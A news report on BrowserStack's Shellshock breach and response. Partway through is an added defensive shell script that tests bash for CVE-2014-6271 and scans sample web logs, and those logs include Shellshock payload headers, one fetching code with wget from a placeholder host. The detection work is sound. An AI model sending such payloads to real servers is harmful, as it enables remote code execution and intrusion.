A machine was not properly patched and, as a result, was penetrated by an attacker using the Shellshock exploit.

Cross-browser testing provider BrowserStack suffered an attack on Sunday in which partial user information was accessed and, subsequently, bogus emails were sent to about 5,000 users.

BrowserStack's application servers run on Amazon Web Services (AWS), and the deployment consists of thousands of servers. One of them was an old prototype machine that had been running since before 2012 and was no longer in active use, according to a notification posted to the BrowserStack website.

That machine had not been properly patched and, as a result, was penetrated using the Shellshock vulnerability (CVE-2014-6271, the GNU bash flaw that executes commands smuggled into environment variables), according to the notification. The attacker was then able to copy a BrowserStack table containing partial user information: email addresses, hashed passwords and last-tested URLs.
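Two checks a responder would run on a legacy host like the one described, as an added example that is not from the article or from BrowserStack: a local test for whether the installed bash still has the CVE-2014-6271 bug, and a scan of web-server logs for the exploit's signature. The script assumes bash and grep are installed and that logs are in Apache combined format; the log lines are constructed for the example (RFC 5737 documentation addresses), and the HTTP-header delivery it looks for is the most common Shellshock vector, not something the article states about this incident.

```shell
#!/bin/sh
# Added example, not BrowserStack's code and not from the article.
# Assumptions: bash and grep are present; logs are Apache combined format.

# Returns "vulnerable", "patched", or "no-bash". A vulnerable bash imports a
# function definition from any environment variable and keeps parsing past
# the closing brace, so the trailing command runs as soon as bash starts.
shellshock_check() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return; }
    out=$(env x='() { :;}; echo SHELLSHOCK_VULNERABLE' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *SHELLSHOCK_VULNERABLE*) echo vulnerable ;;
        *) echo patched ;;
    esac
}

# Counts lines of a combined-format access log (passed as one string) that
# carry the "() {" marker. The usual delivery is an HTTP request to a CGI
# script with the payload in a header such as User-Agent or Referer, which
# the web server exports into the environment of the CGI process.
shellshock_log_hits() {
    # grep -c prints 0 and exits 1 when nothing matches, hence the || true.
    printf '%s\n' "$1" | grep -c '() *{' || true
}

# Constructed sample log: two exploit attempts against /cgi-bin/status and
# one ordinary request.
SAMPLE_LOG='203.0.113.5 - - [09/Nov/2014:03:14:07 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"id\""
198.51.100.7 - - [09/Nov/2014:03:15:20 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Nov/2014:03:16:42 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :; }; wget http://198.51.100.9/x" "-"'

echo "local bash: $(shellshock_check)"
echo "suspicious requests in sample log: $(shellshock_log_hits "$SAMPLE_LOG")"
```

On a host patched after September 2014 the first check prints "patched"; the log scan is deliberately broad, since attackers varied the whitespace inside the marker, so hits should be reviewed rather than treated as confirmed compromise.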

“[The attacker] just started copying users table when we stopped him,” Ritesh Arora, one of the founders of BrowserStack, told SCMagazine.com in a Wednesday email correspondence. “They got a portion of our users email addresses, but were only able to email around 5000 of them by the time we came in and blocked our AWS keys.”

The email, which was posted to Pastebin on Wednesday, claimed to be from The BrowserStack Team and asserted that BrowserStack had lied to customers about security in its terms of service, that all data had likely been compromised, and that the company was shutting down.

“We don't know yet, [but it] looks like a very deliberate attempt to malign us,” Arora said. The notification indicates that BrowserStack has “a trace and the IP of the hacker” and will be in touch with authorities, but Arora could not share any further details.

BrowserStack has revoked its existing AWS keys and passwords and generated new ones, migrated all backups to encrypted storage and removed the unencrypted copies, reviewed its logs to confirm there were no other compromises, and added new checks and alerts, according to the notification.

The BrowserStack service was taken down upon discovery of the incident, inconveniencing users for several hours, the notification adds. “This incident has made us better as a team, increased our security and commitment to customers,” Arora said.